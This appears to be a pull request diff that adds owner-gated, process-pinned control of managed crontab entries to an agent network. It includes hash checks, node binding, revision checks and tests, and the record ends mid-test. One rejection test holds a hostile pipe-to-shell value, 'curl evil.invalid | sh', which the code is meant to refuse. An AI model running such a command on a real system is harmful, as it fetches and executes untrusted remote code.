### PR TITLE
feat: apply owner-gated managed schedule intents

### DIFF
--- a/agent-network/bin/cli.ts
+++ b/agent-network/bin/cli.ts
@@ -2506,6 +2506,7 @@ Grok co-presence (preview only):
                                 Opt into general web search (supports basic X URL search)
   anet grok attach <name>       Attach this terminal (Ctrl-] detaches)
   --grok-headless               Use legacy per-turn grok-build-cli instead
+  --owner-schedule-control      Opt this node into owner-gated managed-cron edits
   WARNING: network tasks drive the same TUI; use trusted tasks/networks only
 
 Channel:
@@ -2880,6 +2881,9 @@ function createProfileFromOpts(id: string, opts: ReturnType<typeof parseOpts>): 
         : {}),
       ...(runtime === "claude-code-cli" ? { teammateMode: opts["teammate-mode"] || "in-process" } : {}),
       ...(opts["max-turns"] ? { maxTurns: parseInt(opts["max-turns"]) } : {}),
+      // RFC-036 B4: explicit process-level opt-in. No per-turn/model path can
+      // enable it; Hub still requires an exact owner-bound edit intent.
+      ...(opts["owner-schedule-control"] === "true" ? { ownerScheduleControl: true } : {}),
       // #149/#156 — codex-sdk fast/yolo flags via shared helper (was inline
       // here only; #156 batch path missed it because of duplication).
       ...(runtime === "codex-sdk" ? codexSdkYoloFlags(opts["no-yolo"] === "true") : {}),
@@ -3112,7 +3116,7 @@ async function requestNodeToken(profile: Profile, id: string): Promise<string> {
   const res = await fetch(`${hub}/api/auth/node-token`, {
     method: "POST",
     headers: { Authorization: `Bearer ${userToken}`, "Content-Type": "application/json" },
-    body: JSON.stringify({ network_id: networkId, node_name: nodeName }),
+    body: JSON.stringify({ network_id: networkId, node_name: nodeName, node_id: profile.node_id }),
   });
   const body = await res.json() as any;
   if (!body?.ok || !body.token) {
@@ -4066,7 +4070,7 @@ async function createCommand(idOverride?: string) {
     nodeTokenRes = await fetch(`${gc.hub}/api/auth/node-token`, {
       method: "POST",
       headers: { Authorization: `Bearer ${gc.token}`, "Content-Type": "application/json" },
-      body: JSON.stringify({ network_id: gc.network_id, node_name: id }),
+      body: JSON.stringify({ network_id: gc.network_id, node_name: id, node_id: profile.node_id }),
     }).then(r => r.json() as any);
   } catch (e: any) {
     console.error(`[anet] ❌ Could not reach hub: ${e.message}`);
@@ -12823,7 +12827,7 @@ async function migrateNode(id: string, opts: { hub: string; utok: string; networ
       const res = await fetch(`${opts.hub}/api/auth/node-token`, {
         method: "POST",
         headers: { Authorization: `Bearer ${opts.utok}`, "Content-Type": "application/json" },
-        body: JSON.stringify({ network_id: opts.networkId, node_name: raw.node_name }),
+        body: JSON.stringify({ network_id: opts.networkId, node_name: raw.node_name, node_id: raw.node_id }),
       });
       const body = await res.json() as any;
       if (!body?.ok || !body.token) {
@@ -12991,7 +12995,7 @@ async function doctorCommand() {
           const r = await fetch(`${gc.hub}/api/auth/node-token`, {
             method: "POST",
             headers: { Authorization: `Bearer ${gc.token}`, "Content-Type": "application/json" },
-            body: JSON.stringify({ network_id: gc.network_id, node_name: nodeName }),
+            body: JSON.stringify({ network_id: gc.network_id, node_name: nodeName, node_id: p.node_id }),
           });
           const body = await r.json() as any;
           if (body?.ok && body.token) {

--- a/agent-node/src/cli.ts
+++ b/agent-node/src/cli.ts
@@ -19,6 +19,7 @@ import { claudeCommhubToolAliases } from "./claude-tool-aliases";
 import { getHostTelemetry } from "./host-telemetry";
 import { getProcessTelemetry, incrementInFlight, decrementInFlight } from "./process-telemetry";
 import { readExternalSchedulesSnapshot } from "./external-schedules";
+import { createOwnerScheduleConsumer, type OwnerScheduleConsumer } from "./owner-schedule-consumer";
 import { parseGoalCommand } from "./goals/parser";
 import {
   appendLegacyScheduledGoalNotice,
@@ -748,6 +749,9 @@ function reloadNodeToken(): boolean {
 }
 const LOG_DIR = opts["log-dir"] || join(process.cwd(), ".anet", "nodes", ALIAS, "logs");
 const NODE_DIR = configFilePath ? dirname(configFilePath) : join(process.cwd(), ".anet", "nodes", ALIAS);
+// RFC-036 B4 — immutable for this process lifetime. Runtime/model turns never
+// get to enable this capability; the launcher must opt the node in before boot.
+const OWNER_SCHEDULE_CONTROL_ENABLED = fileConfig.flags?.ownerScheduleControl === true;
 const GOALS_PATH = opts["goals-path"] || fileConfig.flags?.goalsPath || fileConfig.goalsPath || join(NODE_DIR, "goals.json");
 const GOAL_TICK_MS = Math.max(10_000, parseInt(opts["goal-tick-ms"] || process.env.ANET_GOAL_TICK_MS || fileConfig.flags?.goalTickMs || "30000"));
 const goalStore = new GoalStore(GOALS_PATH, GROK_EXECUTION_MODE === "cli"
@@ -1271,7 +1275,9 @@ const register = async () => {
     network_id: NETWORK_ID || undefined,
     host: getHostTelemetry(),
     process_telemetry: getProcessTelemetry(),
-    external_schedules: readExternalSchedulesSnapshot(configFilePath),
+    external_schedules: readExternalSchedulesSnapshot(configFilePath, undefined, {
+      ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED,
+    }),
   });
   // Server is authoritative: if it told us a canonical alias different
   // from what we just sent, treat that as a snapshot update so the
@@ -1302,7 +1308,9 @@ const reportStatus = async (status: string, task?: string) => {
     network_id: NETWORK_ID || undefined,
     host: getHostTelemetry(),
     process_telemetry: getProcessTelemetry(),
-    external_schedules: readExternalSchedulesSnapshot(configFilePath),
+    external_schedules: readExternalSchedulesSnapshot(configFilePath, undefined, {
+      ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED,
+    }),
     // RFC-024 N6 — masked snapshot of effective model+flags so dashboard
     // can show the current state without touching per-node files.
     // config_update_capable signals whether this process runs under a
@@ -5693,6 +5701,11 @@ async function connectSSE() {
                 warn(`restart-apply failed: ${e?.message || e}`),
               );
             }
+            if (ev.type === "external_schedule_edit") {
+              log(`← SSE external_schedule_edit ${ev.intent_id || ""}`);
+              // Doorbell only: the authenticated pull response is authoritative.
+              void ownerScheduleConsumer?.trigger();
+            }
             // RFC-026 P1 — daemon-only doorbell. host_supervisor nodes
             // process this; non-daemons silently ignore (config gate).
             if (ev.type === "create_node" && fileConfig.role === "host_supervisor") {
@@ -5893,6 +5906,21 @@ if (GROK_COPRESENCE) {
 }
 await register();
 log("已注册到 CommHub");
+let ownerScheduleConsumer: OwnerScheduleConsumer | null = null;
+try {
+  ownerScheduleConsumer = createOwnerScheduleConsumer({
+    enabled: OWNER_SCHEDULE_CONTROL_ENABLED,
+    hubUrl: COMMHUB_URL,
+    token: () => AUTH_TOKEN,
+    nodeId: NODE_ID || "",
+    configPath: configFilePath,
+    log: (message) => warn(`[owner-schedule] ${message}`),
+  });
+  if (ownerScheduleConsumer.enabled) log("  owner schedule control: enabled (process-pinned)");
+} catch (startupError: any) {
+  error(`[owner-schedule] startup refused: ${startupError?.message || startupError}`);
+  process.exit(1);
+}
 scheduleWorkInboxDrain();
 scheduleInformationalInboxDrain();
 // RFC-024 — fire a reportStatus immediately on startup so the
@@ -6008,6 +6036,7 @@ let shuttingDown = false;
 const shutdown = async () => {
   if (shuttingDown) return;
   shuttingDown = true;
+  ownerScheduleConsumer?.stop();
   log("shutting down...");
   await closeOpencodeRuntime("signal shutdown");
   await grokCopresenceRuntimeSession?.close().catch((e: any) => {

--- a/agent-node/src/cli.ts
+++ b/agent-node/src/cli.ts
@@ -1277,6 +1277,7 @@ const register = async () => {
     process_telemetry: getProcessTelemetry(),
     external_schedules: readExternalSchedulesSnapshot(configFilePath, undefined, {
       ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED,
+      ownerNodeId: NODE_ID || undefined,
     }),
   });
   // Server is authoritative: if it told us a canonical alias different
@@ -1310,6 +1311,7 @@ const reportStatus = async (status: string, task?: string) => {
     process_telemetry: getProcessTelemetry(),
     external_schedules: readExternalSchedulesSnapshot(configFilePath, undefined, {
       ownerControlEnabled: OWNER_SCHEDULE_CONTROL_ENABLED,
+      ownerNodeId: NODE_ID || undefined,
     }),
     // RFC-024 N6 — masked snapshot of effective model+flags so dashboard
     // can show the current state without touching per-node files.

--- a/agent-node/src/external-schedules.test.ts
+++ b/agent-node/src/external-schedules.test.ts
@@ -4,6 +4,7 @@ import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { mkdtempSync } from "node:fs";
 import { parseExternalSchedulesManifest, readExternalSchedulesSnapshot } from "./external-schedules";
+import type { CrontabAdapter } from "./owner-schedule-control";
 
 const roots: string[] = [];
 afterEach(() => { for (const root of roots.splice(0)) rmSync(root, { recursive: true, force: true }); });
@@ -64,5 +65,29 @@ describe("external schedule manifest", () => {
     expect(readExternalSchedulesSnapshot(config, "2026-08-10T02:00:00Z")).toEqual({
       observed_at: "2026-08-10T02:00:00Z", schedules: [], error: "unsafe_manifest",
     });
+  });
+
+  test("editable/revision are derived only from a verified managed crontab under the process gate", () => {
+    const { manifest, config } = fixture();
+    writeFileSync(manifest, JSON.stringify({ external_schedules: [{
+      id: "news-pull", name: "News", kind: "cron", frequency: "stale",
+      enabled: false,
+    }] }));
+    const commandTail = " /usr/bin/grok-news --latest";
+    const hash = new Bun.CryptoHasher("sha256").update(commandTail).digest("hex");
+    const adapter: CrontabAdapter = {
+      read: () => [
+        `# ANET-MANAGED-SCHEDULE id=news-pull revision=7 command_sha256=${hash}`,
+        `0 */6 * * *${commandTail}`,
+        "# ANET-MANAGED-SCHEDULE-END id=news-pull",
+        "",
+      ].join("\n"),
+      install: () => { throw new Error("not used"); },
+    };
+    const disabled = readExternalSchedulesSnapshot(config, "2026-08-10T02:00:00Z", { crontabAdapter: adapter })!;
+    expect(disabled.schedules[0].editable).toBeUndefined();
+    expect(disabled.schedules[0].revision).toBeUndefined();
+    const enabled = readExternalSchedulesSnapshot(config, "2026-08-10T02:00:00Z", { ownerControlEnabled: true, crontabAdapter: adapter })!;
+    expect(enabled.schedules[0]).toMatchObject({ frequency: "0 */6 * * *", enabled: true, editable: true, revision: 7 });
   });
 });

--- a/agent-node/src/external-schedules.test.ts
+++ b/agent-node/src/external-schedules.test.ts
@@ -77,9 +77,9 @@ describe("external schedule manifest", () => {
     const hash = new Bun.CryptoHasher("sha256").update(commandTail).digest("hex");
     const adapter: CrontabAdapter = {
       read: () => [
-        `# ANET-MANAGED-SCHEDULE id=news-pull revision=7 command_sha256=${hash}`,
+        `# ANET-MANAGED-SCHEDULE node_id=n_owner_schedule id=news-pull revision=7 command_sha256=${hash}`,
         `0 */6 * * *${commandTail}`,
-        "# ANET-MANAGED-SCHEDULE-END id=news-pull",
+        "# ANET-MANAGED-SCHEDULE-END node_id=n_owner_schedule id=news-pull",
         "",
       ].join("\n"),
       install: () => { throw new Error("not used"); },
@@ -87,7 +87,7 @@ describe("external schedule manifest", () => {
     const disabled = readExternalSchedulesSnapshot(config, "2026-08-10T02:00:00Z", { crontabAdapter: adapter })!;
     expect(disabled.schedules[0].editable).toBeUndefined();
     expect(disabled.schedules[0].revision).toBeUndefined();
-    const enabled = readExternalSchedulesSnapshot(config, "2026-08-10T02:00:00Z", { ownerControlEnabled: true, crontabAdapter: adapter })!;
+    const enabled = readExternalSchedulesSnapshot(config, "2026-08-10T02:00:00Z", { ownerControlEnabled: true, ownerNodeId: "n_owner_schedule", crontabAdapter: adapter })!;
     expect(enabled.schedules[0]).toMatchObject({ frequency: "0 */6 * * *", enabled: true, editable: true, revision: 7 });
   });
 });

--- a/agent-node/src/external-schedules.ts
+++ b/agent-node/src/external-schedules.ts
@@ -1,5 +1,6 @@
 import { lstatSync, readFileSync } from "node:fs";
 import { basename, dirname, join } from "node:path";
+import { managedCronInventory, type CrontabAdapter } from "./owner-schedule-control.js";
 
 const MAX_MANIFEST_BYTES = 64 * 1024;
 const MAX_SCHEDULES = 64;
@@ -22,6 +23,8 @@ export interface ExternalScheduleReport {
   next_run_at: string | null;
   log_ref: string | null;
   enabled: boolean;
+  editable?: boolean;
+  revision?: number;
 }
 
 export interface ExternalSchedulesSnapshot {
@@ -45,7 +48,11 @@ function timestamp(value: unknown, field: string): string | null {
   return new Date(text).toISOString();
 }
 
-export function parseExternalSchedulesManifest(raw: string, observedAt = new Date().toISOString()): ExternalSchedulesSnapshot {
+export function parseExternalSchedulesManifest(
+  raw: string,
+  observedAt = new Date().toISOString(),
+  managed = new Map<string, { cron: string; enabled: boolean; revision: number }>(),
+): ExternalSchedulesSnapshot {
   const parsed = JSON.parse(raw) as unknown;
   if (!parsed || typeof parsed !== "object" || Array.isArray(parsed)) throw new Error("manifest must be an object");
   const root = parsed as Record<string, unknown>;
@@ -68,11 +75,12 @@ export function parseExternalSchedulesManifest(raw: string, observedAt = new Dat
     const logRef = logPath ? basename(logPath) : null;
     if (logPath && (!logRef || logRef === "." || logRef === "..")) throw new Error(`invalid log_path ${index}`);
     if (row.enabled !== undefined && typeof row.enabled !== "boolean") throw new Error(`invalid enabled ${index}`);
+    const controlled = kind === "cron" ? managed.get(id) : undefined;
     return {
       id,
       name: boundedString(row.name, "name", 200)!,
       kind: kind as ExternalScheduleReport["kind"],
-      frequency: boundedString(row.frequency, "frequency", 120)!,
+      frequency: controlled?.cron ?? boundedString(row.frequency, "frequency", 120)!,
       last_run_at: timestamp(row.last_run_at, "last_run_at"),
       last_status: lastStatus as ExternalScheduleReport["last_status"],
       last_error: row.last_error == null ? null : boundedString(row.last_error, "last_error", 500, true),
@@ -80,7 +88,8 @@ export function parseExternalSchedulesManifest(raw: string, observedAt = new Dat
       // Never report a host path. The basename is enough to identify the log
       // locally without exposing the node's directory layout to Hub clients.
       log_ref: logRef,
-      enabled: row.enabled === undefined ? true : row.enabled === true,
+      enabled: controlled?.enabled ?? (row.enabled === undefined ? true : row.enabled === true),
+      ...(controlled ? { editable: true, revision: controlled.revision } : {}),
     };
   });
   return { observed_at: timestamp(observedAt, "observed_at")!, schedules };
@@ -89,6 +98,7 @@ export function parseExternalSchedulesManifest(raw: string, observedAt = new Dat
 export function readExternalSchedulesSnapshot(
   configPath: string,
   observedAt = new Date().toISOString(),
+  options: { ownerControlEnabled?: boolean; crontabAdapter?: CrontabAdapter } = {},
 ): ExternalSchedulesSnapshot | undefined {
   if (!configPath) return undefined;
   const manifestPath = join(dirname(configPath), "external-schedules.json");
@@ -97,7 +107,13 @@ export function readExternalSchedulesSnapshot(
     if (!stat.isFile() || stat.isSymbolicLink() || stat.size > MAX_MANIFEST_BYTES) {
       return { observed_at: observedAt, schedules: [], error: "unsafe_manifest" };
     }
-    return parseExternalSchedulesManifest(readFileSync(manifestPath, "utf8"), observedAt);
+    let managed = new Map<string, { cron: string; enabled: boolean; revision: number }>();
+    if (options.ownerControlEnabled) {
+      try { managed = managedCronInventory(options.crontabAdapter); } catch {
+        // Inventory remains honestly read-only when crontab cannot be verified.
+      }
+    }
+    return parseExternalSchedulesManifest(readFileSync(manifestPath, "utf8"), observedAt, managed);
   } catch (error: any) {
     if (error?.code === "ENOENT") return { observed_at: observedAt, schedules: [] };
     if (error instanceof SyntaxError || /^invalid |^unknown |manifest /.test(String(error?.message || ""))) {

--- a/agent-node/src/external-schedules.ts
+++ b/agent-node/src/external-schedules.ts
@@ -98,7 +98,7 @@ export function parseExternalSchedulesManifest(
 export function readExternalSchedulesSnapshot(
   configPath: string,
   observedAt = new Date().toISOString(),
-  options: { ownerControlEnabled?: boolean; crontabAdapter?: CrontabAdapter } = {},
+  options: { ownerControlEnabled?: boolean; ownerNodeId?: string; crontabAdapter?: CrontabAdapter } = {},
 ): ExternalSchedulesSnapshot | undefined {
   if (!configPath) return undefined;
   const manifestPath = join(dirname(configPath), "external-schedules.json");
@@ -108,8 +108,8 @@ export function readExternalSchedulesSnapshot(
       return { observed_at: observedAt, schedules: [], error: "unsafe_manifest" };
     }
     let managed = new Map<string, { cron: string; enabled: boolean; revision: number }>();
-    if (options.ownerControlEnabled) {
-      try { managed = managedCronInventory(options.crontabAdapter); } catch {
+    if (options.ownerControlEnabled && options.ownerNodeId) {
+      try { managed = managedCronInventory(options.ownerNodeId, options.crontabAdapter); } catch {
         // Inventory remains honestly read-only when crontab cannot be verified.
       }
     }

--- a/agent-node/src/owner-schedule-consumer.test.ts
+++ b/agent-node/src/owner-schedule-consumer.test.ts
@@ -1,0 +1,121 @@
+import { afterEach, describe, expect, test } from "bun:test";
+import { createHash } from "node:crypto";
+import { chmodSync, existsSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { createOwnerScheduleConsumer } from "./owner-schedule-consumer.js";
+import type { CrontabAdapter } from "./owner-schedule-control.js";
+
+const roots: string[] = [];
+afterEach(() => { for (const root of roots.splice(0)) rmSync(root, { recursive: true, force: true }); });
+
+function fixture() {
+  const root = mkdtempSync(join(tmpdir(), "anet-owner-consumer-"));
+  roots.push(root);
+  chmodSync(root, 0o700);
+  const configPath = join(root, "config.json");
+  writeFileSync(configPath, "{}\n", { mode: 0o600 });
+  const tail = " /usr/bin/grok-news --latest";
+  const commandHash = createHash("sha256").update(tail).digest("hex");
+  let current = [
+    `# ANET-MANAGED-SCHEDULE id=news-pull revision=7 command_sha256=${commandHash}`,
+    `0 */6 * * *${tail}`,
+    "# ANET-MANAGED-SCHEDULE-END id=news-pull",
+    "",
+  ].join("\n");
+  let installs = 0;
+  const adapter: CrontabAdapter = { read: () => current, install: (value) => { installs += 1; current = value; } };
+  return { root, configPath, adapter, current: () => current, installs: () => installs };
+}
+
+function delivered(nodeId = "n_owner_schedule") {
+  return {
+    ok: true,
+    intent: {
+      intent_id: "sei_12345678-1234-1234-1234-123456789abc",
+      node_id: nodeId,
+      schedule_id: "news-pull",
+      base_revision: 7,
+      patch: { cron: "0 */12 * * *", enabled: false },
+      status: "delivered",
+    },
+  };
+}
+
+describe("process-gated owner schedule consumer", () => {
+  test("disabled process registers no poll and makes zero network/host calls", async () => {
+    const f = fixture();
+    let fetches = 0;
+    const consumer = createOwnerScheduleConsumer({
+      enabled: false,
+      hubUrl: "http://hub.invalid",
+      token: "not-even-a-token",
+      nodeId: "not-even-a-node",
+      configPath: f.configPath,
+      fetchImpl: (async () => { fetches += 1; throw new Error("must not run"); }) as any,
+      crontabAdapter: f.adapter,
+    });
+    await consumer.trigger();
+    expect(consumer.enabled).toBe(false);
+    expect(fetches).toBe(0);
+    expect(f.installs()).toBe(0);
+  });
+
+  test("exact node intent applies once, ACKs, and deletes journal only after ACK", async () => {
+    const f = fixture();
+    const requests: Array<{ url: string; init?: RequestInit }> = [];
+    const fetchImpl = (async (input: string | URL | Request, init?: RequestInit) => {
+      const url = String(input);
+      requests.push({ url, init });
+      if (url.endsWith("/pending")) return Response.json(delivered());
+      return Response.json({ ok: true });
+    }) as typeof fetch;
+    const consumer = createOwnerScheduleConsumer({
+      enabled: true, hubUrl: "http://hub.invalid", token: "ntok_test", nodeId: "n_owner_schedule",
+      configPath: f.configPath, fetchImpl, crontabAdapter: f.adapter, pollIntervalMs: 60_000,
+    });
+    await consumer.trigger();
+    consumer.stop();
+    expect(f.installs()).toBe(1);
+    expect(f.current()).toContain("revision=8");
+    const ack = requests.find((request) => request.url.endsWith("/ack"))!;
+    expect(JSON.parse(String(ack.init?.body))).toEqual({ status: "applied", result_revision: 8 });
+    expect(existsSync(join(f.root, ".external-schedule-edit-journal.json"))).toBe(false);
+  });
+
+  test("foreign-node intent and invalid authority shape never reach crontab", async () => {
+    const f = fixture();
+    const fetchImpl = (async () => Response.json(delivered("n_foreign"))) as typeof fetch;
+    const consumer = createOwnerScheduleConsumer({
+      enabled: true, hubUrl: "http://hub.invalid", token: "ntok_test", nodeId: "n_owner_schedule",
+      configPath: f.configPath, fetchImpl, crontabAdapter: f.adapter, pollIntervalMs: 60_000,
+    });
+    await consumer.trigger();
+    consumer.stop();
+    expect(f.installs()).toBe(0);
+    expect(f.current()).toContain("revision=7");
+  });
+
+  test("lost ACK keeps journal; same delivered intent recovers without a second install", async () => {
+    const f = fixture();
+    let ackCalls = 0;
+    const fetchImpl = (async (input: string | URL | Request) => {
+      const url = String(input);
+      if (url.endsWith("/pending")) return Response.json(delivered());
+      ackCalls += 1;
+      return ackCalls === 1 ? Response.json({ ok: false }, { status: 503 }) : Response.json({ ok: true });
+    }) as typeof fetch;
+    const consumer = createOwnerScheduleConsumer({
+      enabled: true, hubUrl: "http://hub.invalid", token: "ntok_test", nodeId: "n_owner_schedule",
+      configPath: f.configPath, fetchImpl, crontabAdapter: f.adapter, pollIntervalMs: 60_000,
+    });
+    await consumer.trigger();
+    expect(f.installs()).toBe(1);
+    expect(existsSync(join(f.root, ".external-schedule-edit-journal.json"))).toBe(true);
+    await consumer.trigger();
+    consumer.stop();
+    expect(f.installs()).toBe(1);
+    expect(ackCalls).toBe(2);
+    expect(existsSync(join(f.root, ".external-schedule-edit-journal.json"))).toBe(false);
+  });
+});

--- a/agent-node/src/owner-schedule-consumer.test.ts
+++ b/agent-node/src/owner-schedule-consumer.test.ts
@@ -18,9 +18,9 @@ function fixture() {
   const tail = " /usr/bin/grok-news --latest";
   const commandHash = createHash("sha256").update(tail).digest("hex");
   let current = [
-    `# ANET-MANAGED-SCHEDULE id=news-pull revision=7 command_sha256=${commandHash}`,
+    `# ANET-MANAGED-SCHEDULE node_id=n_owner_schedule id=news-pull revision=7 command_sha256=${commandHash}`,
     `0 */6 * * *${tail}`,
-    "# ANET-MANAGED-SCHEDULE-END id=news-pull",
+    "# ANET-MANAGED-SCHEDULE-END node_id=n_owner_schedule id=news-pull",
     "",
   ].join("\n");
   let installs = 0;

--- a/agent-node/src/owner-schedule-consumer.ts
+++ b/agent-node/src/owner-schedule-consumer.ts
@@ -1,0 +1,138 @@
+import {
+  applyOwnerScheduleIntent,
+  finalizeOwnerScheduleIntent,
+  OwnerScheduleSafetyError,
+  recordOwnerScheduleAudit,
+  type CrontabAdapter,
+  type ScheduleEditIntent,
+} from "./owner-schedule-control.js";
+import { parseExternalSchedulePatch } from "./shared/external-schedule-contract.js";
+
+const INTENT_ID_RE = /^sei_[0-9a-f-]+$/;
+const ID_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,199}$/;
+
+type FetchLike = typeof fetch;
+
+export type OwnerScheduleConsumer = {
+  enabled: boolean;
+  trigger(): Promise<void>;
+  stop(): void;
+};
+
+function boundedIntent(value: unknown, expectedNodeId: string): ScheduleEditIntent {
+  if (!value || typeof value !== "object" || Array.isArray(value)) throw new OwnerScheduleSafetyError("invalid Hub schedule intent");
+  const row = value as Record<string, unknown>;
+  if (row.status !== "delivered" || typeof row.intent_id !== "string" || !INTENT_ID_RE.test(row.intent_id)
+    || row.node_id !== expectedNodeId || typeof row.schedule_id !== "string" || !ID_RE.test(row.schedule_id)
+    || !Number.isSafeInteger(row.base_revision) || Number(row.base_revision) < 0) {
+    throw new OwnerScheduleSafetyError("invalid Hub schedule intent");
+  }
+  return {
+    intent_id: row.intent_id,
+    node_id: expectedNodeId,
+    schedule_id: row.schedule_id,
+    base_revision: Number(row.base_revision),
+    patch: parseExternalSchedulePatch(row.patch),
+  };
+}
+
+function errorCode(error: unknown): string {
+  const message = String(error instanceof Error ? error.message : error);
+  if (/revision conflict/.test(message)) return "revision_conflict";
+  if (/not managed/.test(message)) return "schedule_not_managed";
+  if (/invalid_cron|invalid_patch|invalid_enabled/.test(message)) return "invalid_patch";
+  if (error instanceof OwnerScheduleSafetyError) return "local_safety_refused";
+  return "local_apply_failed";
+}
+
+export function createOwnerScheduleConsumer(options: {
+  enabled: boolean;
+  hubUrl: string;
+  token: string | (() => string);
+  nodeId: string;
+  configPath: string;
+  pollIntervalMs?: number;
+  fetchImpl?: FetchLike;
+  crontabAdapter?: CrontabAdapter;
+  log?: (message: string) => void;
+}): OwnerScheduleConsumer {
+  if (!options.enabled) return { enabled: false, trigger: async () => {}, stop: () => {} };
+  const getToken = typeof options.token === "function" ? options.token : () => options.token as string;
+  if (!options.hubUrl || !getToken().startsWith("ntok_") || !ID_RE.test(options.nodeId) || !options.configPath) {
+    throw new OwnerScheduleSafetyError("owner schedule control requires hub, bound ntok, node_id and config path");
+  }
+  const fetchImpl = options.fetchImpl ?? fetch;
+  const log = options.log ?? (() => {});
+  const endpoint = `${options.hubUrl.replace(/\/$/, "")}/api/nodes/${encodeURIComponent(options.nodeId)}/external-schedule-edits`;
+  let stopped = false;
+  let running: Promise<void> | null = null;
+
+  const run = async () => {
+    if (stopped) return;
+    const token = getToken();
+    if (!token.startsWith("ntok_")) throw new OwnerScheduleSafetyError("owner schedule control lost its bound ntok");
+    const headers = { Authorization: `Bearer ${token}`, "Content-Type": "application/json" };
+    const response = await fetchImpl(`${endpoint}/pending`, { headers });
+    if (!response.ok) throw new OwnerScheduleSafetyError(`schedule intent pull failed: ${response.status}`);
+    const payload = await response.json() as any;
+    if (!payload?.ok || payload.intent == null) return;
+    const intent = boundedIntent(payload.intent, options.nodeId);
+    let ack: Record<string, unknown>;
+    let journalCreated = false;
+    try {
+      const applied = applyOwnerScheduleIntent({
+        configPath: options.configPath,
+        expectedNodeId: options.nodeId,
+        intent,
+        adapter: options.crontabAdapter,
+      });
+      journalCreated = true;
+      ack = { status: "applied", result_revision: applied.result_revision };
+    } catch (error) {
+      const code = errorCode(error);
+      if (/rollback failed|recovery conflict|required/.test(String(error instanceof Error ? error.message : error))) {
+        log(`owner schedule intent ${intent.intent_id} requires local recovery`);
+        return;
+      }
+      // A journal may have been created before a verified rollback. It is
+      // finalized only after Hub accepts the rejected terminal state.
+      journalCreated = true;
+      ack = { status: "rejected", error_code: code };
+    }
+    const ackResponse = await fetchImpl(`${endpoint}/${encodeURIComponent(intent.intent_id)}/ack`, {
+      method: "POST",
+      headers,
+      body: JSON.stringify(ack),
+    });
+    if (!ackResponse.ok) throw new OwnerScheduleSafetyError(`schedule intent ack failed: ${ackResponse.status}`);
+    const ackPayload = await ackResponse.json() as any;
+    if (!ackPayload?.ok) throw new OwnerScheduleSafetyError("schedule intent ack rejected");
+    if (journalCreated) {
+      recordOwnerScheduleAudit(options.configPath, {
+        intent_id: intent.intent_id,
+        schedule_id: intent.schedule_id,
+        base_revision: intent.base_revision,
+        status: ack.status as "applied" | "rejected",
+        ...(ack.result_revision === undefined ? {} : { result_revision: Number(ack.result_revision) }),
+        ...(ack.error_code === undefined ? {} : { error_code: String(ack.error_code) }),
+      });
+      finalizeOwnerScheduleIntent(options.configPath, intent.intent_id);
+    }
+  };
+
+  const trigger = async () => {
+    if (stopped) return;
+    if (!running) running = run().catch((error) => {
+      log(`owner schedule control: ${errorCode(error)}`);
+    }).finally(() => { running = null; });
+    await running;
+  };
+  const timer = setInterval(() => { void trigger(); }, options.pollIntervalMs ?? 15_000);
+  timer.unref();
+  void trigger();
+  return {
+    enabled: true,
+    trigger,
+    stop() { stopped = true; clearInterval(timer); },
+  };
+}

--- a/agent-node/src/owner-schedule-control.test.ts
+++ b/agent-node/src/owner-schedule-control.test.ts
@@ -25,9 +25,9 @@ function crontab(revision = 7, cron = "0 */6 * * *", enabled = true, commandTail
   const job = `${cron}${commandTail}`;
   return [
     "MAILTO=ops@example.invalid",
-    `# ANET-MANAGED-SCHEDULE id=news-pull revision=${revision} command_sha256=${hash(commandTail)}`,
+    `# ANET-MANAGED-SCHEDULE node_id=n_owner_schedule id=news-pull revision=${revision} command_sha256=${hash(commandTail)}`,
     enabled ? job : `# ANET-DISABLED ${job}`,
-    "# ANET-MANAGED-SCHEDULE-END id=news-pull",
+    "# ANET-MANAGED-SCHEDULE-END node_id=n_owner_schedule id=news-pull",
     "17 2 * * * /usr/bin/unmanaged-task",
     "",
   ].join("\n");
@@ -61,10 +61,11 @@ function intent(patch: Record<string, unknown> = { cron: "0 */12 * * *", enabled
 describe("owner schedule managed-cron control", () => {
   test("parses only exact managed markers and publishes bounded inventory", () => {
     const f = fixture();
-    const parsed = parseManagedCrontab(f.current()).get("news-pull")!;
-    expect(parsed).toMatchObject({ revision: 7, enabled: true, cron: "0 */6 * * *" });
+    const parsed = parseManagedCrontab(f.current(), "n_owner_schedule").get("news-pull")!;
+    expect(parsed).toMatchObject({ nodeId: "n_owner_schedule", revision: 7, enabled: true, cron: "0 */6 * * *" });
     expect(parsed.commandTail).toBe(" /usr/bin/grok-news --latest");
-    expect(managedCronInventory(f.adapter).get("news-pull")).toEqual({ cron: "0 */6 * * *", enabled: true, revision: 7 });
+    expect(managedCronInventory("n_owner_schedule", f.adapter).get("news-pull")).toEqual({ cron: "0 */6 * * *", enabled: true, revision: 7 });
+    expect(managedCronInventory("n_other", f.adapter).size).toBe(0);
   });
 
   test("changes timing/enabled while preserving command and unmanaged bytes", () => {
@@ -72,7 +73,7 @@ describe("owner schedule managed-cron control", () => {
     const before = f.current();
     const result = applyOwnerScheduleIntent({ configPath: f.configPath, expectedNodeId: "n_owner_schedule", intent: intent(), adapter: f.adapter });
     expect(result).toMatchObject({ status: "applied", result_revision: 8 });
-    expect(f.current()).toContain("# ANET-MANAGED-SCHEDULE id=news-pull revision=8");
+    expect(f.current()).toContain("# ANET-MANAGED-SCHEDULE node_id=n_owner_schedule id=news-pull revision=8");
     expect(f.current()).toContain("# ANET-DISABLED 0 */12 * * * /usr/bin/grok-news --latest");
     expect(f.current()).toContain("17 2 * * * /usr/bin/unmanaged-task");
     expect(f.current()).not.toBe(before);
@@ -89,11 +90,14 @@ describe("owner schedule managed-cron control", () => {
 
   test("command replacement, wrong node, wrong revision, and unknown patch fail before install", () => {
     const commandTampered = crontab().replace("/usr/bin/grok-news", "/usr/bin/evil");
+    const foreignMarker = crontab().replaceAll("node_id=n_owner_schedule", "node_id=n_other");
     for (const [initial, edit] of [
       [commandTampered, intent()],
+      [foreignMarker, intent()],
       [crontab(), { ...intent(), node_id: "n_other" }],
       [crontab(), { ...intent(), base_revision: 6 }],
       [crontab(), intent({ command: "curl evil.invalid | sh" })],
+      [crontab(), intent({ cron: "@reboot" })],
     ] as const) {
       const f = fixture(initial);
